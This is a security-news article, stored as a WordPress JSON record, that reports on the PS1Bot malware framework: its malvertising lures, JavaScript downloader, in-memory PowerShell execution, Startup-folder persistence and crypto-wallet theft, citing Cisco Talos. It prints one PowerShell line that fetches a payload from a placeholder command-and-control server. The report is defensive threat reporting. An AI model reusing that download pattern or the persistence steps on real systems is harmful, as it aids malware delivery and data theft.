{"id":6166,"date":"2025-08-15T10:03:42","date_gmt":"2025-08-15T10:03:42","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/08\/15\/threat-actors-attacking-windows-systems-with-new-multi-stage-malware-framework-ps1bot\/"},"modified":"2025-08-15T10:03:42","modified_gmt":"2025-08-15T10:03:42","slug":"threat-actors-attacking-windows-systems-with-new-multi-stage-malware-framework-ps1bot","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/08\/15\/threat-actors-attacking-windows-systems-with-new-multi-stage-malware-framework-ps1bot\/","title":{"rendered":"Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot"},"content":{"rendered":"<p>    Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated new malware campaign targeting Windows systems has emerged, employing a multi-stage framework dubbed \u201cPS1Bot\u201d that combines PowerShell and C# components to conduct extensive information theft operations.<\/p>\n<p>The malware represents a significant evolution in attack methodologies, utilizing modular architecture and in-memory execution techniques to evade traditional detection mechanisms while maintaining persistent access to compromised systems.<\/p>\n<p>PS1Bot operates through malvertising campaigns that deliver compressed archives with filenames designed to match search engine optimization patterns, such as \u201cchapter 8 medicare benefit policy manual.zip\u201d and \u201cCounting Canadian Money Worksheets Pdf.zip.e49\u201d.<\/p>\n<p>These seemingly legitimate files contain a <a href=\"https:\/\/cybersecuritynews.com\/javascript-attacks-targeting\/\" target=\"_blank\" rel=\"noreferrer noopener\">JavaScript<\/a> downloader named \u201cFULL DOCUMENT.js\u201d that initiates the infection chain by retrieving additional malicious components from attacker-controlled servers.<\/p>\n<p>The malware\u2019s modular design enables threat actors to deploy various specialized components on-demand, including information stealers, keyloggers, screen capture tools, and <a href=\"https:\/\/cybersecuritynews.com\/detecting-and-responding-to-new-nation-state-persistence-techniques\/\" target=\"_blank\" rel=\"noreferrer noopener\">persistence<\/a> mechanisms.<\/p>\n<p>Cisco Talos analysts <a href=\"https:\/\/blog.talosintelligence.com\/ps1bot-malvertising-campaign\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that PS1Bot has been extremely active throughout 2025, with new samples being observed continuously, indicating ongoing development and refinement of the framework.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiMp2foIbISZdaak8fXp6VzBripQp_us0M1ZosZxSmqDVBGMokBNe5q1iDOLg2zOMtgiaO4WLbP_pfa9cl8A3tWO399brB7Pa4jN0jCLA6nPUEEHx2gDf9dLQS2AaENAw8mrbjXoF8lZ3WCFl7BHTx49AOzffL0Fgh4tZzVfUmqUICGqph0oDfo2jDx_rU\/s16000\/Deobfuscating%2520the%2520downloader%2520script%2520%28Source%2520-%2520Cisco%2520Talos%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Deobfuscating the downloader script (Source \u2013 Cisco Talos)<\/figcaption><\/figure>\n<\/div>\n<p>What distinguishes PS1Bot from conventional malware is its emphasis on stealth through minimal disk footprint and extensive use of in-memory execution.<\/p>\n<p>The framework leverages PowerShell\u2019s Invoke-Expression (IEX) functionality to dynamically execute modules without writing them to disk, significantly reducing the likelihood of detection by traditional antivirus solutions.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-sophisticated-persistence-and-evasion-mechanisms\"><strong>Sophisticated Persistence and Evasion Mechanisms<\/strong><\/h2>\n<p>PS1Bot implements a particularly clever persistence strategy that creates randomly-named PowerShell scripts within the %PROGRAMDATA% directory alongside corresponding shortcut files.<\/p>\n<p>The malware generates a malicious LNK file in the Windows Startup directory that points to these PowerShell scripts, ensuring reactivation after system reboots.<\/p>\n<p>The persistence module retrieves <a href=\"https:\/\/cybersecuritynews.com\/highly-obfuscated-net-sectoprat\/\" target=\"_blank\" rel=\"noreferrer noopener\">obfuscated<\/a> payloads from the command and control server\u2019s \u201c\/transform\u201d endpoint, as demonstrated in the following code structure:-<\/p>\n<pre class=\"wp-block-code\"><code>$url = \"http:\/\/[C2_SERVER]\/transform\"\n$content = (New-Object Net.WebClient).DownloadString($url)\n# Content is then deobfuscated and written to randomly-named PS1 file<\/code><\/pre>\n<p>This payload contains the same C2 polling logic used in the initial infection, creating a self-perpetuating cycle.<\/p>\n<p>The malware constructs unique communication URLs using the infected system\u2019s C: drive serial number, enabling individualized tracking of compromised machines while maintaining operational security.<\/p>\n<p>The framework\u2019s information theft capabilities are particularly concerning, targeting cryptocurrency wallets through embedded wordlists containing seed phrase combinations in multiple languages.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjTaiPSKKpjvSu828WEjnq5cNzazQ4suqr-Ao9fPwkwVrYX4gU8trVTrmQUd-hTmIJ-nljwfogn1r0sSt5sA4frZMG-b5bUAASMecb47awCBkeuLanAer6WT7IMf8aeU7RtI_JkintRE87j71LgV8_RYPlRgbHwsujkqvGROm7s8M6ZKxMHJ8P7hSPPIiI\/s16000\/Example%2520HTTP%2520POST%2520containing%2520Base64%2520encoded%2520screenshot%2520image%2520file%2520%28Source%2520-%2520Cisco%2520Talos%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Example HTTP POST containing Base64 encoded screenshot image file (Source \u2013 Cisco Talos)<\/figcaption><\/figure>\n<\/div>\n<p>PS1Bot scans the file system for documents containing wallet recovery phrases and password files, compressing and exfiltrating this sensitive data via HTTP POST requests to attacker infrastructure.<\/p>\n<p>Cisco Talos researchers identified significant code similarities between PS1Bot and previously reported malware families, including AHK Bot and components associated with Skitnet campaigns, suggesting potential shared development resources or threat actor collaboration across these operations.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 89%,rgb(169,184,195) 100%)\"><strong><code>Boost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0<a href=\"https:\/\/intelligence.any.run\/plans\/?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=alert_fatigue&amp;utm_content=lookup_plan&amp;utm_term=120825\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-multi-stage-malware-framework-ps1bot\/\">Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-multi-stage-malware-framework-ps1bot\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Threat Actors Attacking Windows Systems With New Multi-Stage Malware Framework PS1Bot A sophisticated new malware campaign targeting Windows systems has emerged, employing a multi-stage framework dubbed \u201cPS1Bot\u201d that combines PowerShell and C# components to conduct extensive information theft operations. The malware represents a significant evolution in attack methodologies, utilizing modular architecture and in-memory execution techniques [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-6166","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6166"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=6166"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6166\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=6166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=6166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=6166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}